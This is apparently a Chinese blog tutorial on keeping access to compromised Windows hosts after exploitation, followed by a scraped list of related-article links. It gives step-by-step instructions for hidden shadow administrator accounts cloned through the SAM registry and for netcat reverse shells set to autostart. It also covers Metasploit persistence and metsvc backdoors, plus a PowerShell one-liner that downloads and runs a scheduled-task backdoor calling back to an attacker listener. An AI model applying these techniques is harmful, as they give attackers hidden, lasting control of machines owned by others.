后渗透阶段的权限维持
前言
当我们在渗透过程中通过漏洞获取到目标主机权限后,往往会因为服务器管理员发现和修补漏洞而导致对服务器权限的丢失,所以权限维持就显得很重要了。
在windows主机中,我总结了下面几种权限维持的方法,不足之处还望各位大佬斧正。
添加影子账户
影子账户可以理解为和主体一模一样但是又看不见的账户,其隐蔽性较好,只能在注册表里面看到。
首先,我们需要创建一个隐藏账号OMG$ 使用命令 net user OMG$ /add 即可。
注:隐藏账户是指在使用 net user 命令下看不到的账户。
打开注册表编辑器,找到HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/选项,双击Administrator记住类型下面的十六进制值0x1f4找到左侧对应得文件夹即000001F4,双击打开复制里面F下的所有内容。
同理,打开OMG$对应的文件夹,将刚刚复制的内容粘贴到F 下。然后将Names下的OMG$和000003EC导出注册表,名字随意取。接着删除OMG$用户(net user OMG$ /del)。最后一步,导入刚刚导出的两个注册表即可(双击即可导入)。
注销当前用户,使用OMG$登录,发现登录成功:
NC自启动
我们可以在受害主机上上传NC,并修改注册表将NC添加为开机自启,不过这种方法需要有一台公网服务器或者将本机端口进行映射。
先来看一下nc的命令:
首先在服务器上开一个监听端口 (nc –l –vv –p yourport):
然后在受害主机上执行nc –t –e cmd.exe ipport
,可以看到服务器上已经接收到来自受害主机的cmdshell。
现在需要修改受害主机注册表,将上一条命令nc –t –ecmd.exe ip port
添加为开机自启,这样受害主机每一次重启之后仍然会主动连接我们的服务器,不过前提是你的服务器得一直监听相关端口,有点鸡肋。
MSF权限维持
使用MSF维持权限的前提是先获得一个Meterpretershell,通过Merterpretershell获取持久性shell的方法有两种:
Persistence模块
首先查看persistence模块帮助信息:
运行run persistence -U -i 10 -p 4444 -r 192.168.34.132
:
-U:设置后门在用户登录后自启动。该方式会在HKCU\Software\Microsoft\Windows\CurrentVersion\Run下添加注册表信息。推荐使用该参数;
-i:设置反向连接间隔时间,单位为秒;
-p:设置反向连接的端口号;
-r:设置反向连接的ip地址。
重启受害主机后,shell仍然反弹会回来:
Metsvc 模块
一样的,先来看一下它的参数:
很简单,直接运行就可以了。
从这里可以看到,它是通过在,目标主机上开启了一个服务。
监听31337端口利用handler下的windows/metsvc_bind_tcp模块,重新获得shell。
Powershell权限维持
这里推荐一个powershell脚本:https://github.com/re4lity/Schtasks-Backdoor,使用方法见Readme文件。
运行命令:
powershell.exe-exec bypass -c "IEX (New-ObjectNet.WebClient).DownloadString('http://192.168.42.220/Invoke-taskBackdoor.ps1');Invoke-Tasksbackdoor-method nccat -ip 192.168.34.131 -port 53 -time 2"
根据自己的情况做适当修改。
192.168.42.220 是我的本地服务器;
192.168.34.131 是我的一台开了nc监听的主机。
执行上述命令后,192.168.34.131获得一个shell:
总结
通过以上几种方法基本上可以维持一个windows主机的权限,各有利弊,这里只是对常见的方法做了一个总结,更多的方法还需要大家自行探索发现。在实战中推荐大家多用MSF和powershell。
参考:
http://lynnshare.cc/article/?id=17
后渗透阶段的权限维持相关推荐
- windows系统后渗透阶段权限维持方法小结
前言 归纳下windows系统维持权限的方法 1.schtasks 计划任务 schtasks 是 Windows 自带的命令,使用 schtasks 命令创建计划任务 下面这句的意思是创建一个名称是 ...
- [系统安全] 四十五.APT系列(10)Metasploit后渗透技术信息收集、权限提权和功能模块详解
您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...
- [网络安全提高篇] 一〇三.Metasploit后渗透技术之信息收集、权限提权和功能模块
当您阅读到该篇文章时,作者已经将"网络安全自学篇"设置成了收费专栏,首先说声抱歉.感谢这一年来大家的阅读和陪伴,这100篇安全文章记录了自己从菜鸡到菜鸟的成长史,该部分知识也花了很 ...
- 后渗透之meterpreter学习笔记
0x00 前言 由于最近想学习关于内网渗透的一些知识,前面也有师傅写了关于meterpreter的使用攻略,我这里就来复现学习一下. Meterpreter是Metasploit框架中的一个扩展模块, ...
- Windows下的本地提权漏洞梳理及后渗透简析
1.github网址,截图,不同系统版本对应的漏洞 2.后渗透阶段 壹 通过1day漏洞进行Windows本地提权 分享一个github链接:Windows提权漏洞整理 里面大部分是基于x64系统 ...
- Metasploit——后渗透测试阶段
目录 1.已经获得目标系统控制权后扩大战果 2.基于已有session扩大战果 3.获取system账号权限 4.绕过UAC限制 5.利用漏洞直接提权为system 6.图形化payload 7.Ps ...
- 后渗透之meterpreter使用攻略
本文转载来源:https://xz.aliyun.com/t/2536 Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令. ...
- 内网渗透系列:权限维持方法小结
目录 前言 一.Windows 1.密码记录工具 (1)WinlogonHack (2)键盘记录器 (3)NTPass 2.常用的存储Payload位置 (1)WMI (2)包含数字签名的PE文件 ( ...
- 渗透工具-后渗透-权限维持-Cobalt strike
Cobalt strike 渗透测试人员的先进威胁战术 英文名词翻译对照表 命令快查 Cobaltstrike简介 Cobaltstrike架构 信息收集模块System Profiler user- ...
- linux 两块硬盘做r0,本文是emp3r0r:Linux用户打造的Linux后渗透框架的后续。
介绍 首先感谢大家对 emp3r0r 的肯定,如果有什么想法可以在评论区交流. 最近添加了些我觉得可能有用的东西,今天要介绍的就是dropper和packer两个新功能. dropper顾名思义是用来 ...
最新文章
- Windows CE 程序设计 (3rd 版)
- 全志代码中的bug之2
- Android清空Fragment缓存,清空Fragment来退栈中某个Fragment
- mysql-connector-mysql 8.0 (spring-boot-starter-parent 管理的版本) + Activiti 6.x 自动建表失败
- 本想制衡经销商价格,不料成为黄牛货源地!茅台电商公司被迫解散!
- 信号学习第一课--基础知识
- Quartus II 9.0正式版下载
- 史上最著名的电脑病毒
- Matlab 批量读取,处理及保存图片
- 波段高低点指标公式 k线高低点 大盘主图公式
- 新手必看学习JAVA的N个理由,看阿…
- 什么是加密?什么是md5加密算法?
- 护眼灯的标准是什么?护眼台灯国家标准给你答案
- Apache IoTDB 鼠年总结
- lastfm 1k user 数据集简介
- 算法训练 逗志芃的危机
- 判断手机号是否可注册淘宝
- 用计算机怎么计算sh 3,舍伍德数Sh计算公式与在线计算器_三贝计算网_23bei.com
- 执行shell脚本进入到指定目录
- 将json数据集合表格显示及表格中增加按钮
热门文章
- 星际迷航中企业号的动力系统_五月四日与您同在:《星球大战》(和《星际迷航》)如何激发现实生活中的技术...
- Removing unused resources requires unused code shrinking to be turned on
- 【股票】股票是什么?什么情况下股票会涨?
- 饿了么推荐系统:从0到1
- 初识F5之BIGIP-LTM负载均衡
- pandas绘图plot函数
- 比较两个记事本文件内容的差异
- 全栈之初识JWT -- Web安全的守护神
- 爱你穿越时间,两行来至秋末的眼泪
- 全球一月内两次遭到病毒暴击 2017网络安全生态峰会或有解药